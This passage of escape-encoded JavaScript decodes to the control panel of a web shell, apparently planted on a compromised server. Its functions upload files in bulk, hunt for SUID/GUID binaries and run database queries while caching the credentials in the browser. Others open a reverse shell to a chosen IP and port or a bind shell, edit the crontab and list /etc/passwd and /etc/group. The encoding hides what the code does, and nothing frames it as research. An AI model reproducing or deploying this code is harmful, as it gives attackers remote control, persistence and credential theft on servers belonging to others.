x74\141\x2e\x61\x70\160\145\156\x64\50\x27\x70\x27\54\x20\164\150\151\163\56\145\156\x63\162\171\x70\164\50\112\123\x4f\116\56\163\x74\x72\x69\x6e\x67\x69\x66\171\x28\x7b\x20\x61\x63\x74\151\157\x6e\x3a\40\x27\155\141\163\163\137\165\160\x6c\157\141\x64\x27\x2c\x20\x64\x69\162\163\x3a\40\x4a\x53\117\116\x2e\163\164\x72\151\156\147\151\146\171\50\x73\145\x6c\x65\143\164\145\x64\x44\151\x72\163\51\x20\x7d\x29\51\x29\73\40\x66\157\x72\x6d\x44\x61\164\x61\x2e\x61\x70\x70\x65\156\144\50\x27\146\x69\154\x65\47\54\x20\x66\151\x6c\145\x29\x3b\xa\x20\x9\x9\11\164\162\x79\40\x7b\40\143\157\156\x73\x74\x20\x72\145\163\40\x3d\x20\x61\167\141\151\164\x20\146\x65\x74\x63\150\x28\123\103\x52\x49\x50\x54\137\125\x52\114\x2c\40\173\x20\155\145\x74\x68\157\x64\72\x20\x27\x50\x4f\123\x54\x27\x2c\40\142\x6f\144\x79\x3a\40\146\x6f\x72\x6d\x44\x61\164\x61\40\x7d\x29\x3b\x20\x63\x6f\156\x73\x74\x20\x6a\x73\157\x6e\x20\x3d\x20\112\x53\x4f\x4e\56\x70\141\162\x73\145\50\x74\x68\x69\x73\x2e\144\145\143\x72\x79\x70\164\50\x61\167\x61\151\x74\40\x72\145\163\56\164\145\170\164\50\51\x29\51\x3b\x20\164\x68\x69\163\x2e\x74\x6f\141\163\164\x28\152\163\157\x6e\x2e\x6d\x65\x73\x73\x61\147\145\x2c\x20\x6a\163\x6f\x6e\56\163\164\x61\164\165\163\x20\x7c\174\x20\47\x73\x75\143\143\x65\163\163\x27\x29\73\x20\175\x20\143\141\164\x63\x68\40\x28\x65\x29\x20\173\40\x74\150\x69\163\56\x74\x6f\x61\163\164\50\47\115\x61\163\x73\x20\165\160\x6c\157\x61\144\x20\146\141\151\154\x65\x64\x2e\47\x2c\x20\47\145\162\162\x6f\x72\x27\51\73\40\x63\157\x6e\x73\157\x6c\145\x2e\145\x72\162\157\x72\x28\x65\51\73\x20\x7d\xa\x20\x9\11\11\146\x69\156\141\x6c\x6c\171\x20\x7b\40\146\151\x6c\145\x49\x6e\x70\x75\x74\56\166\141\154\165\x65\x20\75\40\47\47\73\40\x7d\12\40\x9\11\175\x2c\xa\x20\11\11\141\163\x79\156\x63\40\146\151\x6e\144\123\165\151\144\x47\165\x69\144\x46\x69\x6c\145\x73\50\51\x20\173\12\40\11\x9\x9\143\x6f\156\x73\164\x20\x6f\165\x74\x70\x75\x74\105\x6c\x20\x3d\x20\x64\x6f\x63\165\155\x65\x6e\x74\56\x67\x65\x74\x45\154\x65\x6d\x65\x6e\164\x42\x79\x49\x64\50\47\x73\165\151\144\55\x67\x75\151\144\55\x6f\165\164\x70\x75\x74\47\51\x3b\40\157\165\164\x70\165\164\x45\154\56\151\156\156\x65\162\x54\x65\x78\164\x20\75\40\x27\123\143\141\156\156\x69\x6e\147\x2e\x2e\x2e\40\124\x68\x69\163\x20\155\x61\x79\x20\x74\x61\153\x65\40\163\145\166\x65\x72\141\154\x20\x6d\151\156\x75\164\x65\163\56\47\x3b\12\40\11\11\11\x74\x68\151\163\x2e\164\157\x61\163\164\50\47\123\164\141\162\164\151\x6e\x67\40\x53\x55\x49\x44\57\x47\125\x49\104\x20\x73\143\x61\x6e\x2e\56\56\47\51\73\x20\x63\x6f\156\163\x74\40\162\145\163\40\75\x20\x61\x77\x61\x69\x74\40\164\150\x69\x73\56\x61\160\151\50\47\146\151\156\144\137\163\165\151\144\x5f\147\165\151\x64\x27\51\x3b\xa\40\x9\11\x9\151\146\x20\x28\x72\145\163\x20\x26\46\x20\x72\x65\163\x2e\163\x74\141\164\x75\x73\x20\75\x3d\x3d\40\x27\163\x75\143\x63\x65\163\163\47\x29\40\x7b\x20\x6f\x75\x74\160\165\164\x45\x6c\56\x69\x6e\156\x65\x72\x48\x54\115\114\x20\75\x20\x72\145\x73\x2e\144\x61\x74\141\73\40\x74\x68\x69\163\x2e\164\157\141\x73\x74\x28\47\x53\125\x49\104\x2f\107\x55\111\x44\x20\x73\x63\x61\x6e\40\x63\157\x6d\160\154\x65\164\x65\56\x27\x29\73\40\x7d\40\x65\x6c\x73\x65\40\x7b\40\x6f\165\164\x70\x75\x74\105\x6c\x2e\151\156\156\x65\x72\x54\145\x78\164\40\75\x20\47\x53\x63\x61\x6e\x20\x66\x61\x69\x6c\145\x64\x2e\47\x3b\40\175\12\x20\x9\11\x7d\x2c\12\40\x9\x9\x61\x73\x79\x6e\x63\x20\x72\165\156\104\142\x51\x75\x65\x72\171\50\51\x20\173\xa\x20\11\11\11\143\157\x6e\x73\164\40\x63\x72\x65\144\163\40\x3d\40\x7b\x20\144\142\137\150\157\x73\164\x3a\x20\144\157\143\165\155\x65\x6e\x74\56\147\x65\x74\105\154\145\x6d\145\156\x74\x42\x79\x49\144\50\x27\x64\x62\55\x68\157\163\x74\x27\x29\x2e\166\x61\154\165\x65\x2c\x20\144\142\137\x75\x73\x65\162\72\x20\144\x6f\x63\165\x6d\145\x6e\164\x2e\x67\145\x74\105\154\145\x6d\145\156\164\102\171\x49\144\50\47\x64\142\55\x75\x73\x65\x72\x27\51\56\x76\141\x6c\x75\145\54\x20\144\142\x5f\160\x61\163\163\x3a\x20\144\x6f\x63\x75\x6d\x65\156\x74\x2e\147\145\164\105\154\145\x6d\x65\x6e\164\102\171\111\144\x28\x27\x64\x62\x2d\160\141\x73\x73\x27\51\x2e\x76\x61\x6c\x75\145\54\x20\x64\x62\x5f\x6e\x61\x6d\145\72\x20\144\157\x63\165\155\x65\x6e\x74\56\147\x65\x74\x45\154\145\155\145\156\164\102\x79\111\x64\50\47\x64\x62\x2d\x6e\x61\x6d\x65\47\x29\56\x76\x61\154\x75\145\40\x7d\x3b\12\x20\x9\11\x9\143\157\156\x73\x74\x20\144\x62\x5f\x71\x75\x65\x72\171\40\x3d\x20\x64\157\143\165\155\145\x6e\x74\x2e\x67\145\x74\105\154\x65\155\145\156\x74\x42\171\x49\x64\50\x27\144\x62\x2d\161\x75\145\x72\171\x27\x29\x2e\166\141\x6c\165\x65\73\xa\40\x9\x9\11\143\157\156\x73\164\x20\162\x65\x73\x75\154\x74\x73\103\157\156\164\x61\151\156\145\x72\40\75\40\144\x6f\143\165\155\145\x6e\164\56\x67\145\164\x45\x6c\x65\x6d\x65\156\164\x42\171\x49\144\x28\47\144\x62\55\x72\145\163\165\154\x74\x73\x2d\143\x6f\156\x74\x61\151\156\145\162\47\x29\x3b\xa\x20\x9\11\11\x69\x66\x20\50\41\143\x72\145\x64\x73\x2e\x64\x62\x5f\x68\157\163\164\x20\x7c\174\40\x21\143\162\145\144\163\56\x64\x62\137\x75\163\145\x72\40\174\174\40\x21\x64\x62\x5f\161\x75\x65\x72\x79\x29\40\x72\x65\164\165\x72\156\40\x74\150\151\x73\x2e\164\x6f\141\x73\x74\x28\x27\110\157\163\x74\x2c\40\x55\x73\145\x72\54\x20\x61\156\x64\x20\x51\x75\x65\x72\x79\40\141\162\145\40\162\x65\x71\165\151\x72\145\144\x2e\47\54\x20\47\145\x72\162\157\162\x27\51\73\12\x20\x9\x9\x9\x74\150\151\163\x2e\x73\141\x76\145\x44\x62\x43\x72\x65\144\x65\156\164\151\x61\154\x73\x28\x63\x72\x65\144\x73\x29\73\12\40\11\x9\x9\x72\x65\163\165\154\164\163\103\157\156\x74\141\x69\156\x65\162\x2e\151\156\x6e\x65\162\x48\x54\115\114\x20\75\40\47\x3c\160\x3e\105\170\x65\143\x75\164\151\x6e\x67\x20\161\165\145\162\x79\56\56\56\x3c\x2f\160\x3e\x27\73\12\40\x9\11\x9\143\157\x6e\x73\164\x20\162\145\x73\x20\x3d\x20\141\x77\x61\x69\x74\40\x74\x68\151\x73\x2e\x61\160\151\50\x27\144\x61\164\141\142\x61\x73\145\x5f\161\x75\x65\x72\171\x27\54\x20\173\40\x2e\x2e\56\143\x72\145\x64\x73\x2c\40\x64\142\x5f\x71\165\145\162\171\40\x7d\x29\x3b\xa\x20\x9\x9\x9\x69\146\40\50\x21\x72\145\163\x29\x20\x7b\x20\162\x65\163\165\x6c\164\x73\x43\x6f\x6e\164\x61\x69\x6e\145\162\56\151\x6e\x6e\145\x72\x48\124\115\x4c\x20\75\x20\x27\x3c\160\x20\x73\164\171\154\145\x3d\42\143\157\154\157\x72\72\166\141\162\x28\55\55\141\x63\x63\x65\156\164\55\162\x65\x64\51\x3b\42\x3e\101\x50\x49\40\x72\145\161\165\145\163\164\40\x66\x61\x69\154\145\144\x2e\x3c\57\x70\76\x27\x3b\x20\x72\145\164\165\162\x6e\73\40\175\xa\x20\x9\x9\11\x69\x66\40\50\x72\x65\163\x2e\163\164\141\x74\x75\163\40\x3d\75\75\x20\47\163\x75\143\143\145\163\163\x27\x29\x20\x7b\12\x20\11\x9\x9\x9\x69\x66\40\x28\x72\145\x73\56\x72\x6f\167\163\x29\x20\x7b\x20\x6c\x65\x74\40\164\x61\142\154\145\x20\75\x20\x27\x3c\x74\141\x62\154\145\x20\x63\x6c\x61\x73\163\x3d\42\x72\x65\163\x75\x6c\164\x73\55\164\x61\142\x6c\145\x22\x3e\x3c\164\150\x65\141\144\x3e\x3c\x74\162\76\x27\x3b\x20\x72\x65\163\56\x68\145\141\144\145\162\x73\56\146\157\x72\105\141\143\x68\50\150\40\x3d\76\40\164\141\142\x6c\x65\40\x2b\x3d\x20\x60\x3c\x74\x68\76\44\x7b\150\175\74\57\164\150\76\140\51\x3b\x20\x74\141\142\x6c\145\40\53\75\40\x27\74\x2f\164\162\x3e\x3c\57\164\x68\x65\x61\x64\x3e\74\164\x62\x6f\x64\x79\76\x27\73\40\162\x65\x73\56\x72\157\x77\x73\56\146\157\162\x45\x61\x63\150\x28\162\x20\x3d\76\x20\173\40\164\x61\x62\154\145\x20\x2b\x3d\x20\47\74\x74\162\x3e\47\x3b\x20\x72\145\163\56\150\x65\x61\144\x65\162\x73\x2e\146\157\162\105\141\143\x68\x28\150\40\75\76\x20\164\141\x62\x6c\x65\x20\x2b\75\x20\x60\74\164\x64\76\44\x7b\162\133\150\x5d\x20\x7c\x7c\40\47\116\x55\x4c\x4c\x27\175\x3c\57\x74\x64\x3e\140\51\73\x20\x74\x61\x62\x6c\x65\x20\53\x3d\x20\47\x3c\x2f\164\x72\x3e\47\73\x20\x7d\51\x3b\x20\164\141\142\x6c\x65\x20\53\75\x20\47\74\x2f\164\x62\x6f\x64\171\x3e\74\x2f\164\141\142\x6c\x65\x3e\47\73\x20\x72\145\163\x75\154\164\x73\x43\x6f\156\x74\x61\x69\x6e\x65\162\x2e\151\x6e\156\145\162\x48\x54\x4d\114\x20\x3d\x20\164\x61\142\154\x65\x3b\40\175\40\145\x6c\x73\x65\x20\x7b\40\x72\x65\x73\165\154\x74\163\103\157\156\x74\141\151\156\x65\162\56\x69\x6e\x6e\x65\x72\x48\x54\x4d\114\40\75\x20\140\x3c\x70\x20\x73\x74\x79\154\145\x3d\42\x63\x6f\154\x6f\162\72\x76\x61\162\x28\55\x2d\x61\x63\x63\x65\x6e\x74\55\147\x72\x65\145\156\x29\73\x22\76\x24\x7b\162\145\163\x2e\155\x65\x73\163\x61\x67\x65\175\x3c\x2f\160\76\x60\73\x20\x69\146\50\162\x65\163\x2e\141\146\x66\x65\x63\164\145\144\x5f\162\157\x77\163\40\41\x3d\x3d\40\x75\156\x64\145\x66\151\x6e\x65\x64\x29\40\162\x65\x73\165\x6c\164\x73\103\157\156\164\x61\151\x6e\145\162\x2e\x69\x6e\x6e\145\x72\110\124\x4d\x4c\40\x2b\75\40\x60\x3c\160\76\x52\x6f\x77\x73\40\141\146\x66\145\x63\164\x65\144\72\40\x24\x7b\x72\x65\x73\x2e\x61\146\146\145\143\x74\145\x64\137\162\157\167\x73\x7d\74\x2f\x70\x3e\x60\x3b\x20\175\xa\x20\11\x9\x9\175\x20\145\x6c\x73\145\40\173\x20\x72\x65\163\x75\154\x74\163\x43\x6f\x6e\164\x61\x69\x6e\x65\162\56\151\156\x6e\145\162\110\124\x4d\114\x20\x3d\40\x60\x3c\x70\x20\x73\x74\171\x6c\x65\75\x22\143\x6f\x6c\157\162\x3a\x76\x61\x72\x28\55\x2d\141\143\143\x65\156\x74\x2d\162\x65\144\51\73\x22\76\44\173\x72\145\163\x2e\x6d\145\163\163\141\147\145\175\x3c\x2f\x70\x3e\x60\x3b\40\175\12\x20\11\x9\x7d\x2c\xa\x20\11\11\x73\141\x76\x65\x44\x62\103\x72\145\144\x65\x6e\164\151\141\x6c\x73\50\143\162\x65\x64\163\51\40\173\40\x6c\x6f\143\141\x6c\x53\x74\157\x72\x61\x67\x65\x2e\x73\145\164\111\164\x65\155\50\x27\x64\142\137\143\162\x65\144\163\x27\54\x20\x4a\123\117\x4e\x2e\163\164\162\151\x6e\147\151\x66\171\50\143\x72\x65\x64\x73\x29\x29\73\40\175\54\xa\40\11\x9\x6c\x6f\141\x64\x44\x62\x43\162\x65\x64\145\x6e\164\x69\x61\154\x73\x28\x29\x7b\40\143\157\x6e\x73\164\x20\143\x72\145\144\x73\x20\x3d\40\x6c\157\x63\x61\x6c\x53\x74\157\162\141\147\x65\x2e\147\x65\164\111\x74\145\155\x28\x27\x64\142\137\143\x72\145\144\163\47\x29\x3b\x20\151\146\x20\50\x63\x72\x65\144\x73\x29\x20\173\x20\164\162\x79\x20\173\x20\x63\x6f\156\x73\164\40\x7b\40\x64\142\x5f\150\x6f\163\x74\x2c\40\144\x62\x5f\x75\163\x65\x72\54\40\x64\142\137\x70\141\163\163\x2c\x20\144\x62\x5f\x6e\141\x6d\145\40\x7d\x20\75\40\112\123\117\116\56\160\x61\162\x73\145\x28\x63\x72\x65\144\163\x29\73\x20\143\157\156\x73\164\40\144\x62\x48\157\163\164\40\x3d\x20\x64\x6f\x63\x75\x6d\145\x6e\164\56\x67\x65\164\x45\x6c\145\155\145\x6e\164\x42\x79\x49\x64\x28\x27\144\142\55\x68\x6f\x73\x74\47\51\x3b\40\x63\157\156\x73\x74\40\144\x62\x55\163\x65\162\40\75\x20\x64\157\143\x75\x6d\x65\156\164\x2e\x67\145\x74\x45\154\145\155\x65\156\164\x42\x79\x49\x64\50\x27\x64\142\x2d\165\163\145\162\x27\51\73\x20\x63\157\156\163\x74\40\144\x62\120\x61\x73\x73\x20\75\40\x64\x6f\143\165\155\145\x6e\164\56\147\145\164\105\x6c\145\155\145\x6e\x74\102\x79\111\x64\x28\x27\x64\x62\x2d\160\x61\163\x73\x27\x29\73\40\143\157\x6e\x73\x74\40\x64\x62\x4e\141\155\x65\40\x3d\40\144\157\x63\x75\155\145\156\164\x2e\x67\145\x74\105\x6c\x65\x6d\145\x6e\x74\102\171\111\x64\x28\47\x64\142\55\156\141\x6d\x65\x27\x29\x3b\40\151\x66\x20\50\144\142\x48\157\163\x74\51\40\x64\x62\x48\x6f\x73\164\56\x76\x61\154\165\145\x20\75\x20\x64\x62\137\x68\x6f\x73\164\40\x7c\174\40\x27\47\x3b\x20\x69\146\x20\x28\144\x62\x55\x73\x65\x72\51\40\x64\x62\x55\163\x65\x72\56\166\x61\x6c\165\145\x20\x3d\40\144\x62\137\165\163\145\162\x20\174\x7c\40\x27\x27\x3b\40\151\x66\x20\50\x64\x62\x50\141\163\163\x29\40\144\x62\x50\141\x73\x73\56\166\x61\x6c\165\x65\40\x3d\x20\144\x62\137\160\141\x73\x73\x20\174\x7c\40\47\47\x3b\40\x69\x66\x20\50\x64\x62\x4e\141\x6d\x65\x29\x20\x64\x62\116\x61\x6d\x65\x2e\166\141\154\165\x65\x20\x3d\40\144\142\x5f\156\141\155\x65\x20\x7c\174\x20\47\47\73\x20\x7d\x20\143\x61\x74\x63\x68\50\145\x29\x20\173\40\143\157\x6e\163\157\154\145\x2e\145\162\x72\157\162\x28\x27\x45\162\162\157\x72\x20\x6c\x6f\x61\x64\x69\156\x67\40\104\x42\x20\143\x72\x65\144\145\x6e\164\151\141\154\163\x3a\x27\x2c\40\145\x29\x3b\40\175\40\175\40\x7d\54\12\11\x9\x61\163\x79\x6e\x63\40\143\157\x6e\156\145\x63\x74\x52\x65\166\145\x72\163\145\x53\x68\145\154\154\50\x29\x20\x7b\x20\x63\157\156\163\x74\40\151\160\40\75\x20\x64\x6f\x63\165\155\x65\x6e\164\56\147\x65\164\105\x6c\145\155\145\x6e\x74\x42\171\x49\x64\x28\47\x72\x65\166\55\163\x68\145\x6c\154\55\151\160\47\x29\56\x76\141\154\x75\145\x2c\40\x70\x6f\162\164\40\x3d\x20\144\x6f\143\165\155\x65\156\x74\56\147\145\x74\x45\154\x65\x6d\x65\x6e\x74\x42\x79\x49\144\x28\47\162\x65\166\55\x73\x68\x65\154\x6c\x2d\160\157\162\164\x27\x29\x2e\x76\141\154\x75\x65\x3b\40\151\x66\50\151\160\40\x26\46\40\160\x6f\x72\x74\51\x20\x7b\40\x74\150\151\163\56\164\157\x61\163\164\x28\140\101\x74\x74\x65\x6d\x70\x74\151\156\147\40\164\x6f\x20\x63\157\x6e\156\x65\143\x74\40\x74\x6f\40\44\x7b\151\160\175\x3a\x24\173\x70\x6f\162\164\x7d\x2e\56\x2e\x60\51\73\40\143\157\x6e\x73\x74\x20\162\145\x73\x20\x3d\40\x61\x77\141\151\164\40\164\x68\x69\x73\56\141\x70\151\50\47\162\x65\166\x65\x72\163\145\x5f\x73\x68\145\154\x6c\47\x2c\40\x7b\40\151\160\54\40\x70\x6f\x72\x74\40\x7d\x29\x3b\x20\x69\146\x20\50\162\145\x73\x29\x20\x74\150\x69\163\56\x74\157\x61\163\x74\x28\x72\x65\163\x2e\x6d\x65\x73\x73\x61\147\145\54\40\162\145\163\x2e\x73\x74\x61\x74\165\163\x29\73\40\x7d\40\145\x6c\x73\145\x20\x7b\x20\x74\x68\151\163\56\x74\157\x61\163\x74\50\x27\111\x50\40\141\x6e\144\40\120\157\x72\164\40\141\x72\145\x20\x72\145\161\165\x69\x72\145\144\56\x27\x2c\x20\47\x65\162\x72\x6f\162\x27\x29\x3b\40\175\40\x7d\54\xa\11\x9\x61\163\x79\x6e\x63\x20\143\157\156\156\x65\x63\x74\x42\151\x6e\144\x53\x68\145\154\x6c\50\x29\40\x7b\40\143\x6f\x6e\163\x74\40\x70\157\162\x74\x20\75\40\x64\x6f\143\165\155\145\x6e\x74\x2e\147\x65\164\x45\x6c\145\x6d\145\156\x74\x42\x79\x49\144\50\x27\142\151\x6e\x64\x2d\x73\x68\x65\x6c\154\55\160\x6f\x72\164\47\51\x2e\166\141\x6c\x75\145\73\40\151\x66\50\x70\157\162\x74\51\40\173\x20\x74\150\x69\163\56\164\157\141\x73\x74\50\x60\101\x74\x74\145\x6d\x70\164\x69\x6e\x67\x20\x74\157\40\x6c\x69\163\x74\145\156\40\157\156\40\160\157\x72\x74\x20\x24\x7b\x70\x6f\162\164\x7d\56\x2e\56\140\x29\x3b\x20\x63\157\x6e\163\164\x20\x72\x65\163\40\x3d\x20\141\167\x61\x69\164\40\x74\x68\x69\163\56\x61\160\151\x28\47\142\151\156\x64\137\x73\x68\145\154\x6c\x27\54\40\173\40\160\157\162\x74\x20\x7d\x29\x3b\x20\x69\x66\x20\x28\162\x65\163\51\40\164\150\x69\x73\x2e\x74\157\x61\163\x74\x28\x72\145\x73\56\x6d\145\x73\163\141\x67\x65\x2c\x20\x72\x65\x73\x2e\x73\x74\x61\x74\x75\163\x29\73\x20\175\x20\x65\x6c\x73\x65\x20\173\40\164\x68\151\163\56\x74\x6f\141\163\x74\50\47\120\157\162\164\40\151\163\x20\162\145\x71\165\151\162\x65\x64\x2e\x27\x2c\40\x27\x65\x72\162\157\162\x27\x29\x3b\40\x7d\40\175\x2c\12\11\x9\x61\163\x79\156\x63\40\163\x65\x61\162\143\150\106\x69\x6c\145\163\50\51\x20\x7b\xa\11\x9\x9\x63\x6f\156\x73\x74\x20\x70\141\x74\x68\40\75\40\144\157\x63\165\x6d\145\156\x74\x2e\147\x65\x74\x45\154\x65\x6d\x65\156\x74\102\x79\111\144\x28\47\x73\145\141\162\x63\x68\55\160\141\164\x68\x27\51\x2e\166\x61\x6c\165\x65\x2c\40\x70\x61\x74\x74\x65\162\x6e\40\75\x20\144\157\x63\x75\155\x65\156\x74\x2e\x67\x65\164\105\x6c\145\x6d\x65\156\x74\102\171\x49\144\x28\x27\x73\x65\x61\162\143\150\55\x70\x61\164\x74\145\162\156\47\x29\56\166\x61\x6c\x75\x65\x2c\x20\157\x75\x74\160\x75\164\x45\x6c\x20\x3d\x20\144\x6f\143\x75\x6d\x65\x6e\x74\x2e\147\x65\164\x45\x6c\x65\x6d\x65\156\x74\x42\171\x49\x64\50\x27\x73\145\x61\162\143\x68\x2d\x72\145\x73\x75\154\164\163\x2d\157\x75\x74\160\x75\164\x27\x29\73\12\11\11\x9\151\x66\x20\50\41\160\141\x74\x68\x20\174\174\x20\41\x70\x61\x74\164\145\x72\x6e\x29\x20\x72\x65\164\x75\x72\156\40\164\150\x69\x73\56\164\x6f\x61\163\164\50\47\120\141\x74\150\x20\x61\156\x64\x20\x70\141\164\164\x65\162\x6e\x20\x61\162\x65\40\x72\x65\161\x75\x69\162\x65\144\56\x27\54\40\47\145\162\x72\x6f\162\47\x29\x3b\12\11\x9\x9\x6f\x75\x74\x70\165\x74\x45\154\56\x69\x6e\x6e\x65\x72\x54\x65\170\164\x20\75\x20\47\x53\x65\141\162\143\x68\x69\x6e\x67\x2e\x2e\x2e\x27\73\x20\143\157\156\163\x74\40\x72\x65\163\x20\75\40\141\167\x61\x69\x74\x20\x74\x68\151\163\56\141\x70\x69\50\47\163\x65\x61\x72\143\150\x5f\x66\x69\x6c\145\x73\x27\x2c\x20\x7b\40\x70\141\164\150\54\40\x70\141\x74\164\145\162\x6e\x20\175\x29\x3b\40\151\x66\50\x72\145\163\51\40\x6f\165\164\x70\165\164\x45\x6c\56\151\x6e\x6e\x65\x72\x48\x54\115\114\40\x3d\x20\x72\145\x73\56\144\141\x74\x61\73\xa\x9\11\175\x2c\xa\x9\11\141\163\171\x6e\143\40\154\157\141\x64\103\162\157\156\x28\51\40\x7b\40\x63\x6f\x6e\x73\164\x20\162\145\x73\x20\x3d\x20\x61\167\x61\151\x74\40\164\150\x69\x73\x2e\141\x70\x69\50\x27\147\x65\x74\x5f\x63\162\157\156\47\x29\73\x20\x69\146\40\x28\x72\145\163\40\x26\46\40\x72\x65\163\x2e\x73\x74\x61\164\165\163\40\75\x3d\x3d\40\x27\163\165\143\143\x65\x73\x73\47\51\40\x7b\40\144\157\x63\165\155\x65\x6e\164\x2e\147\x65\164\105\x6c\x65\155\145\x6e\164\102\x79\x49\x64\x28\x27\x63\162\157\x6e\55\165\163\x65\x72\x27\51\x2e\151\156\156\x65\x72\124\145\170\164\x20\x3d\x20\x74\x68\151\163\56\165\163\145\162\x3b\x20\143\157\x6e\163\164\40\143\x6f\156\x74\x65\x6e\164\x45\154\x20\x3d\40\144\x6f\143\165\155\x65\x6e\x74\x2e\x67\x65\164\x45\x6c\145\155\x65\x6e\x74\x42\171\x49\144\x28\x27\143\x72\x6f\x6e\x2d\x63\x6f\156\x74\x65\156\164\47\51\73\x20\143\157\x6e\164\145\x6e\164\x45\x6c\56\x76\x61\154\165\x65\x20\x3d\x20\162\145\163\x2e\143\157\x6e\x74\145\x6e\x74\x3b\40\143\x6f\x6e\x74\145\x6e\164\105\154\x2e\x72\145\x61\x64\x4f\x6e\x6c\171\x20\75\40\x21\x72\145\x73\56\167\x72\x69\164\141\142\x6c\x65\x3b\x20\144\157\143\x75\155\145\x6e\x74\56\147\145\x74\105\x6c\x65\x6d\x65\x6e\x74\102\x79\x49\144\x28\x27\x73\141\166\x65\x2d\x63\162\157\156\x2d\x62\x74\x6e\x27\x29\56\144\151\x73\x61\142\x6c\145\x64\40\x3d\40\x21\162\145\163\56\167\x72\151\x74\141\142\154\x65\73\x20\151\146\x28\41\x72\145\163\56\x77\x72\151\x74\141\x62\154\x65\51\x20\x74\x68\151\163\56\x74\157\x61\x73\164\x28\47\x43\162\x6f\x6e\x74\141\x62\x20\151\x73\x20\156\x6f\164\40\x77\x72\x69\x74\x61\x62\x6c\145\x2e\x27\x2c\x20\x27\x65\162\162\x6f\162\47\x29\73\x20\175\40\175\x2c\xa\x9\11\x61\x73\171\156\x63\x20\x73\141\x76\x65\x43\162\x6f\156\x28\x29\x20\x7b\40\143\157\156\163\x74\x20\143\x6f\x6e\164\145\156\x74\40\x3d\40\144\157\x63\x75\155\x65\x6e\x74\x2e\x67\145\x74\105\x6c\145\x6d\145\x6e\x74\102\x79\x49\x64\50\47\x63\162\x6f\156\x2d\143\x6f\x6e\164\145\x6e\x74\47\51\x2e\x76\141\154\x75\x65\x3b\40\143\157\156\x73\164\x20\162\145\x73\x20\x3d\40\141\x77\141\151\x74\x20\x74\x68\x69\x73\x2e\x61\160\x69\x28\x27\163\x61\x76\145\x5f\x63\162\157\156\47\x2c\x20\x7b\40\143\x6f\x6e\x74\145\156\164\x20\x7d\51\73\x20\151\146\x20\50\162\x65\x73\40\46\46\x20\162\x65\x73\56\163\x74\x61\164\165\163\x20\x3d\75\75\40\x27\163\x75\143\x63\x65\x73\x73\x27\x29\x20\173\40\x74\x68\151\163\56\164\157\x61\x73\164\50\x72\x65\163\x2e\x6d\x65\163\x73\141\147\x65\x29\x3b\40\x7d\40\x7d\x2c\12\11\11\141\x73\171\x6e\143\40\147\145\164\125\x73\145\162\163\101\x6e\x64\x47\162\157\x75\160\163\x28\51\40\173\xa\11\x9\11\143\157\156\x73\164\40\x72\x65\x73\40\x3d\x20\141\x77\141\151\164\x20\164\150\x69\x73\56\x61\x70\151\50\x27\147\145\164\137\165\x73\145\162\163\137\x67\162\x6f\165\x70\x73\47\x29\73\x20\143\x6f\156\163\x74\40\x63\x6f\x6e\x74\141\151\156\145\x72\x20\x3d\40\x64\x6f\143\165\155\145\x6e\164\56\x67\145\164\x45\154\145\155\x65\x6e\164\102\171\111\144\x28\x27\165\163\145\162\163\x2d\x67\162\x6f\165\x70\x73\x2d\157\x75\x74\x70\165\164\x27\51\73\xa\11\x9\11\x69\146\40\x28\162\x65\x73\40\46\46\x20\x72\x65\163\x2e\163\164\x61\x74\x75\163\x20\75\x3d\x3d\x20\47\163\x75\x63\143\145\x73\163\47\x29\x20\173\12\11\11\x9\x9\154\x65\x74\40\x75\163\x65\162\163\110\164\155\x6c\40\x3d\40\x27\x3c\150\63\x3e\125\163\145\162\x73\40\50\x2f\145\x74\143\57\160\141\163\163\167\x64\x29\74\x2f\x68\63\x3e\x3c\164\141\142\154\x65\40\143\x6c\x61\163\163\75\x22\x72\145\x73\165\154\x74\x73\x2d\164\x61\x62\x6c\145\42\76\74\x74\150\145\x61\x64\x3e\74\x74\x72\x3e\74\164\x68\x3e\x4e\x61\155\x65\x3c\x2f\164\150\x3e\74\x74\150\x3e\x55\111\104\74\x2f\164\x68\x3e\74\164\x68\x3e\107\x49\104\x3c\57\x74\150\x3e\x3c\x74\x68\x3e\110\157\x6d\x65\74\57\x74\150\x3e\x3c\164\x68\76\123\x68\x65\154\x6c\74\x2f\164\150\76\x3c\x2f\x74\x72\76\74\x2f\x74\x68\145\x61\144\x3e\74\x74\x62\157\x64\171\76\x27\73\12\x9\x9\11\x9\162\145\x73\56\165\x73\145\x72\x73\56\x66\157\162\105\x61\143\150\50\x75\x20\75\76\40\165\163\145\162\x73\110\x74\x6d\154\40\x2b\75\x20\x60\x3c\x74\x72\x3e\x3c\x74\x64\76\44\x7b\x75\x2e\x6e\141\x6d\x65\x7d\x3c\x2f\x74\144\76\74\x74\x64\76\44\x7b\x75\x2e\165\151\144\175\x3c\x2f\164\144\x3e\74\164\x64\x3e\x24\173\165\x2e\147\151\144\x7d\x3c\57\164\144\76\x3c\x74\x64\x3e\44\x7b\x75\56\x68\x6f\155\x65\x7d\74\57\164\144\76\74\164\144\x3e\44\173\x75\56\x73\150\x65\x6c\x6c\x7d\74\57\x74\x64\x3e\74\57\x74\x72\x3e\x60\51\73\12\11\11\x9\11\x75\163\145\162\x73\x48\x74\155\x6c\40\x2b\75\40\47\74\x2f\164\142\x6f\144\171\76\74\57\164\x61\x62\154\x65\76\47\x3b\xa\x9\x9\x9\x9\154\145\164\x20\147\162\x6f\x75\160\163\x48\164\155\154\x20\x3d\40\47\x3c\x68\63\x3e\x47\x72\157\x75\160\x73\40\50\x2f\145\x74\x63\x2f\147\162\157\x75\160\x29\74\57\x68\63\x3e\74\164\x61\x62\x6c\x65\x20\143\x6c\141\x73\x73\x3d\42\162\x65\163\x75\x6c\164\163\x2d\x74\141\x62\154\145\42\x3e\x3c\x74\x68\x65\141\x64\76\x3c\164\162\76\x3c\x74\x68\76\116\141\x6d\x65\x3c\57\164\x68\x3e\74\x74\x68\x3e\x47\x49\104\x3c\57\x74\150\76\74\x74\150\76\115\145\x6d\142\x65\x72\163\x3c\x2f\164\150\76\x3c\x2f\x74\x72\76\x3c\x2f\164\x68\x65\x61\144\76\x3c\x74\x62\x6f\x64\171\76\47\x3b\xa\11\11\x9\11\x72\x65\163\x2e\x67\162\157\x75\x70\163\x2e\x66\x6f\x72\x45\x61\143\x68\x28\147\x20\x3d\76\40\x67\x72\157\165\x70\163\110\164\x6d\154\x20\53\x3d\x20\140\74\x74\x72\x3e\74\x74\x64\x3e\44\x7b\x67\x2e\x6e\x61\x6d\x65\175\x3c\57\x74\x64\76\x3c\164\144\x3e\x24\x7b\x67\x2e\147\x69\144\x7d\x3c\x2f\x74\144\76\74\x74\144\x3e\x24\x7b\x67\x2e\155\145\x6d\142\x65\x72\x73\x7d\x